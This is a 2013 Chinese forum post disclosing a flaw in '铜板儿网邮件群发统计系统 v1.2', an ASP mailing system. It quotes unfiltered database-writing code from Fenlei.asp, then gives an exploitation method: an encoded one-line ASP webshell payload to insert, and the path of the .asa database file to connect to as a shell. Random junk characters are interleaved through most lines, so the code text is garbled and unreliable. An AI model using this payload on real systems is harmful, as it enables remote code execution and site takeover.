找回密码
 立即注册
查看: 2750|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
5 ^) Z! V* m$ L2 R
( r/ S7 t4 S4 f5 |. K" `( DIF Request.QueryString("Action")="del" Then 0 |8 d  I0 O$ _3 v* z6 v# E/ d
ID=Request.QueryString("ID") 4 K3 ^5 p4 @" w5 a4 [0 a
IF Countss ("tui","Fenlei",ID )<>0 then 1 ^7 D; c+ n; M4 g) u& `! f
'略
! m/ X+ `3 V1 ?. I; @$ AIF Request.QueryString("Action")="Add" Then
% A0 g( W+ E1 K3 nTname=Request.Form("Typename") . i8 m' S6 }9 L* `. O
Set Rs=Server.CreateObject("adodb.Recordset") % G$ T- G! G9 k7 W* T9 }' d( Y' n
Sql="Select * From Fenlei Order by id Desc " ' K  h' N! @( B) e6 O
Rs.Open Sql,Conn,1,3
" \$ r* W; }) |/ V# P) ?Rs.Addnew
$ c) F/ X3 t# r0 @7 J+ c$ _$ [- vRs("Typename")=Tname ! @: e& ?8 K/ M1 A  {. g/ r
'略 9 P' b( p  l7 y& F
Set Rs=Server.CreateObject("adodb.Recordset") 8 M6 w' j$ s6 d6 d7 A
Sql="Select * From Fenlei Order by id Desc " 1 ?& Y9 ?' S. M5 I+ }! N) [
Rs.Open Sql,Conn,1,1 / N) D0 l( v) b* x
'略
* t# C* P/ b1 O( ~8 K' T8 k! O%>
- Y/ B- b, d6 w; N9 a. W5 L( B6 b+ I 3 h! q9 G% I5 \1 x7 ?
* I. H7 I, R$ p, r' N, T" P
* [' C# o3 H. E0 U4 c+ n( @
没有过滤,直接写入数据库。
+ J7 _+ b+ V) c$ E   p" Y  R! B3 Y- B# Z& y, ]7 i- }
利用方法:
' N: M1 N0 v, e( P# G9 N$ k  V
6 }+ g: ^+ I) f$ t插入:┼攠數畣整爠煥敵瑳∨≡┩>
3 r, Q: ^6 I0 ~8 J/ |+ s, e4 E$ X. z
: h% D6 a; w3 y) A
  ?% |) E8 R- v连接: http://www.xxx.com/###tongbaner.asa
, {. c/ B8 t7 W/ r) o+ e8 v'默认安装文件: 5 c5 ^/ M0 b5 d- C' i
'install.asp% a. `" r; {, I9 F+ |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表